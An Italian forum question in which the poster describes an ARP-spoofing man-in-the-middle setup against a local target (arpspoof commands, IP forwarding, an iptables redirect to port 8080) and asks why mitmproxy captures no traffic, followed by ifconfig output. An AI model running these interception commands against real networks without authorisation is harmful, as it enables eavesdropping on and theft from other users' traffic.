Ho un computer target a 10.0.0.14
e gateway a 10.0.0.1
. Mi inserisco correttamente come MITM eseguendo
sudo arpspoof -i wlp3s0 -t 10.0.0.1 10.0.0.14
sudo arpspoof -i wlp3s0 -t 10.0.0.14 10.0.0.1
E quando eseguo arp
sul computer di destinazione, vedo che 10.0.0.1
è associato al mio MAC. Sulla mia macchina, eseguo quindi
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i wlp3s0 -p tcp --dport 80 -j REDIRECT --to-port 8080
Infine, eseguo ping google.com
sulla macchina di destinazione. Quando eseguo sudo tcpdump | grep 10.0.0.14
sulla mia macchina, vedo molti pacchetti che riguardano le richieste ping. Ma quando eseguo mitmproxy -T --host
non ottengo nulla! Cosa sto sbagliando?
P.S. Ecco il risultato di ifconfig
:
enp0s25 Link encap:Ethernet HWaddr [redacted]
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:f2500000-f2520000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:49445 errors:0 dropped:0 overruns:0 frame:0
TX packets:49445 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4511425 (4.5 MB) TX bytes:4511425 (4.5 MB)
wlp3s0 Link encap:Ethernet HWaddr [redacted]
inet addr:10.0.0.6 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: 2601:280:4900:e583:a64e:31ff:fe63:ccdc/64 Scope:Global
inet6 addr: fe80::a64e:31ff:fe63:ccdc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:502914 errors:0 dropped:0 overruns:0 frame:0
TX packets:306905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:489697020 (489.6 MB) TX bytes:70008617 (70.0 MB)